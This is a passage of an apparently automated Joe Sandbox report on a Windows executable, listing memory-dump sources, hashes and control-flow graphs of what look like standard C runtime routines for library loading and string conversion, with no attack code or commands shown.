                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0bc921b505293d18f1b108d638dbc54194758d315fb419f6d9121a29cf5583a2
                                                                                                                                                                                                                                        • Instruction ID: b41ac19f679e9fbcd70f74cd885a43d77f797cac8dfd350ddc3cbaa44f521736
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bc921b505293d18f1b108d638dbc54194758d315fb419f6d9121a29cf5583a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0E09231600308EFCB05CF99C544B1AB7F8EB88345F108069E405C7261E338DE44DB44
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ef2cd3062f44f020eda1dfd779a310f176d5fcc015f23cd657994951ea18d4e7
                                                                                                                                                                                                                                        • Instruction ID: 07fbeae432d5b2d1abc21f3055cd19acfdd48b73222d6affb76eca07e169074b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef2cd3062f44f020eda1dfd779a310f176d5fcc015f23cd657994951ea18d4e7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE09235610348DFDB05CF59C544B1AB7F8EB88B44F108079E809C7251E378DE48CB44
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: adbd4596de845751d7e6961fcb297df636a5798e286c65671a9b7c27976bc310
                                                                                                                                                                                                                                        • Instruction ID: a8f39025be97589ec14382bf3efd9b93c65fe5fb0a028d6aad6763e1acce79dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: adbd4596de845751d7e6961fcb297df636a5798e286c65671a9b7c27976bc310
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E04632A11228EBCB14EB89C90499AF3BCEB84F85B11009AB601E3202C274DF00C7D4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 77c9f14661ad52f9ad345d78261c8e7d8a795a60eee6816c579f4d26a5434708
                                                                                                                                                                                                                                        • Instruction ID: 239c611627d1625a090fae15db4e53fdff9dd5ef612cf263a1d35d009b9e13f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77c9f14661ad52f9ad345d78261c8e7d8a795a60eee6816c579f4d26a5434708
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8E0EC75501248EFCB04DF55C549E49B7F8EB44759F1144A5E405D7251D238EF44DA04
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 176f53f7d1528e1ece079d4dbd6502195030b629db2e788b50fc413c1f2272ae
                                                                                                                                                                                                                                        • Instruction ID: 3a9115976815dda0889f7a1440dbb2d521caf9fd5736eb1cd815d06f2cc59384
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 176f53f7d1528e1ece079d4dbd6502195030b629db2e788b50fc413c1f2272ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBC08C78800A0057CF69992083713AA3354F3917C6F8408CFC8020B752D51EAC86DA04
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 4e5496-4e54a2 63 4e5534-4e5537 62->63 64 4e553d 63->64 65 4e54a7-4e54b8 63->65 66 4e553f-4e5543 64->66 67 4e54ba-4e54bd 65->67 68 4e54c5-4e54de LoadLibraryExW 65->68 69 4e555d-4e555f 67->69 70 4e54c3 67->70 71 4e5544-4e5554 68->71 72 4e54e0-4e54e9 GetLastError 68->72 69->66 74 4e5531 70->74 71->69 73 4e5556-4e5557 FreeLibrary 71->73 75 4e54eb-4e54fd call 4555ec 72->75 76 4e5522-4e552f 72->76 73->69 74->63 75->76 79 4e54ff-4e5511 call 4555ec 75->79 76->74 79->76 82 4e5513-4e5520 LoadLibraryExW 79->82 82->71 82->76
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 004E5557
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                        • Opcode ID: 920c7f648574e15737c29bba136ce2df161085614c358394edc06082a146fa94
                                                                                                                                                                                                                                        • Instruction ID: 630f09b0cee1098f61e66f0165781f0e4cfae493efec77c1c9aafe7d0de6474a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 920c7f648574e15737c29bba136ce2df161085614c358394edc06082a146fa94
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2216D32A01D50FBC7219B2AEC45A6B376ADB51375F240112ED06A73C4E774EE04DBD8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 669 495de3-495e0d 670 495e1f-495e22 669->670 671 495e0f-495e1d call 452838 669->671 673 495e28-495e2d 670->673 674 496031 670->674 671->673 676 495e3c-495e3f 673->676 677 495e2f-495e3a call 452838 673->677 678 496033-496044 call 4530df 674->678 676->674 681 495e45-495e47 676->681 677->681 682 495e49-495e4b 681->682 683 495e51-495e53 681->683 682->683 686 495eef-495f05 MultiByteToWideChar 682->686 687 495e59-495e5c 683->687 688 49604b 683->688 686->674 691 495f0b-495f17 686->691 689 495e62-495e65 687->689 690 495ee7-495eea 687->690 692 495eac-495eaf 689->692 693 495e67-495e76 GetCPInfo 689->693 690->678 694 495f1d-495f22 691->694 695 496045-496049 691->695 692->678 693->674 697 495e7c-495e7e 693->697 698 495f24-495f2d call 45350d 694->698 699 495f37-495f42 call 4515cd 694->699 696 496029-49602c call 45382d 695->696 696->674 700 495e80-495e84 697->700 701 495eb4-495eb6 697->701 709 495f4d-495f52 698->709 712 495f2f-495f35 698->712 699->709 710 495f44 699->710 700->692 705 495e86-495e8d 700->705 701->686 707 495eb8-495ebc 701->707 705->692 711 495e8f-495e94 705->711 707->690 713 495ebe-495ec5 707->713 709->696 716 495f58-495f6d MultiByteToWideChar 709->716 715 495f4a 710->715 711->692 717 495e96-495e9a 711->717 712->715 713->690 714 495ec7 713->714 718 495eca-495ecf 714->718 715->709 716->696 719 495f73-495f8c MultiByteToWideChar 716->719 720 495e9c-495e9e 717->720 721 495ea4-495eaa 717->721 718->690 722 495ed1-495ed5 718->722 719->696 723 495f92-495f9e 719->723 720->688 720->721 721->692 721->711 724 495edf-495ee5 722->724 725 495ed7-495ed9 722->725 726 49601d 723->726 727 495fa0-495fa5 723->727 724->690 724->718 725->688 725->724 730 496021-496024 call 45382d 726->730 728 495fba-495fc5 call 4515cd 727->728 729 495fa7-495fb0 call 45350d 727->729 736 495fd0-495fd5 728->736 738 495fc7 728->738 729->736 737 495fb2-495fb8 729->737 730->696 736->730 739 495fd7-495fec MultiByteToWideChar 736->739 740 495fcd 737->740 738->740 739->730 741 495fee-49601b CompareStringEx call 45382d * 2 739->741 740->736 741->678
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(?,?), ref: 00495E6E
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00495EFA
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00495F65
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00495F81
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00495FE4
                                                                                                                                                                                                                                        • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00496001
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2984826149-0
                                                                                                                                                                                                                                        • Opcode ID: d4090e9f5678f68b57803d7aa467d148aa7aa8ab03a4f7641fa962539c45398d
                                                                                                                                                                                                                                        • Instruction ID: d4eac9fffabfee3a1065a087a2294ceb555d5822076f2e8d9c447ca1866e5926
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4090e9f5678f68b57803d7aa467d148aa7aa8ab03a4f7641fa962539c45398d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B771D132900659ABDF22DF64CC85BAF7FB5AF05365F25006BE814A7291D73A8D04C7A8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1058 47567b-475693 1059 475695-4756a5 call 452838 1058->1059 1060 4756a9-4756d1 MultiByteToWideChar 1058->1060 1059->1060 1069 4756a7 1059->1069 1062 4756d7-4756e3 1060->1062 1063 475835-475846 call 4530df 1060->1063 1066 475825 1062->1066 1067 4756e9-4756ee 1062->1067 1068 475829 1066->1068 1071 475703-47570e call 4515cd 1067->1071 1072 4756f0-4756f9 call 45350d 1067->1072 1073 47582b-475833 call 45382d 1068->1073 1069->1060 1079 475710 1071->1079 1080 475719-47571e 1071->1080 1072->1080 1082 4756fb-475701 1072->1082 1073->1063 1083 475716 1079->1083 1080->1068 1084 475724-475737 MultiByteToWideChar 1080->1084 1082->1083 1083->1080 1084->1068 1085 47573d-475756 LCMapStringEx 1084->1085 1085->1068 1086 47575c-475764 1085->1086 1087 475796-4757a2 1086->1087 1088 475766-47576b 1086->1088 1090 475817 1087->1090 1091 4757a4-4757a6 1087->1091 1088->1073 1089 475771-475773 1088->1089 1089->1073 1092 475779-475791 LCMapStringEx 1089->1092 1093 47581b-475823 call 45382d 1090->1093 1094 4757bb-4757c6 call 4515cd 1091->1094 1095 4757a8-4757b1 call 45350d 1091->1095 1092->1073 1093->1073 1102 4757d1-4757d6 1094->1102 1103 4757c8 1094->1103 1095->1102 1104 4757b3-4757b9 1095->1104 1102->1093 1106 4757d8-4757f2 LCMapStringEx 1102->1106 1105 4757ce 1103->1105 1104->1105 1105->1102 1106->1093 1107 4757f4-4757fb 1106->1107 1108 475801-475804 1107->1108 1109 4757fd-4757ff 1107->1109 1110 475807-475815 WideCharToMultiByte 1108->1110 1109->1110 1110->1093
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004756C4
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 0047572F
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047574C
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0047578B
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004757EA
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0047580D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2829165498-0
                                                                                                                                                                                                                                        • Opcode ID: 93ea37c8252d13b503e44d68a2019b91cde8d9752de2987ce24ea71cc0c05762
                                                                                                                                                                                                                                        • Instruction ID: 8d0cddab2bd9c31ae0642668cecc7b5ce0b8d51d39d490292eb89f2aa84c6d9e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93ea37c8252d13b503e44d68a2019b91cde8d9752de2987ce24ea71cc0c05762
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C951E232500609EBEF206F61DC44FEB3BA9EF44751F11842AFD18EA250D7B88C24CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1321 49cf80-49cfd1 call 456474 call 49cf40 call 4527e3 1328 49d02d-49d030 1321->1328 1329 49cfd3-49cfe5 1321->1329 1330 49d050-49d059 1328->1330 1331 49d032-49d03f call 45312a 1328->1331 1329->1330 1332 49cfe7-49cffe 1329->1332 1337 49d044-49d04d call 49cf40 1331->1337 1334 49d000-49d00e call 455d21 1332->1334 1335 49d014 1332->1335 1344 49d010 1334->1344 1345 49d024-49d02b 1334->1345 1336 49d017-49d01c 1335->1336 1336->1332 1339 49d01e-49d020 1336->1339 1337->1330 1339->1330 1342 49d022 1339->1342 1342->1337 1346 49d05a-49d063 1344->1346 1347 49d012 1344->1347 1345->1337 1348 49d09d-49d0ad call 4559f7 1346->1348 1349 49d065-49d06c 1346->1349 1347->1336 1355 49d0af-49d0be call 45312a 1348->1355 1356 49d0c1-49d13c call 49cf40 call 454a57 call 451dc5 1348->1356 1349->1348 1351 49d06e-49d07d call 4521c6 1349->1351 1357 49d09a 1351->1357 1358 49d07f-49d097 1351->1358 1355->1356 1369 49d13e-49d140 1356->1369 1370 49d141-49d148 call 4545ed 1356->1370 1357->1348 1358->1357 1373 49d14a-49d14f call 45502e 1370->1373 1374 49d151-49d153 1370->1374 1373->1369
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0049CFB7
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0049D048
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0049D0C8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate
                                                                                                                                                                                                                                        • String ID: csm$j2E
                                                                                                                                                                                                                                        • API String ID: 2268201637-745517429
                                                                                                                                                                                                                                        • Opcode ID: f846e89b939f9fac9fcc4162ed96f5c8dfcdcd3e6ac35b0fe50633cd49c887cb
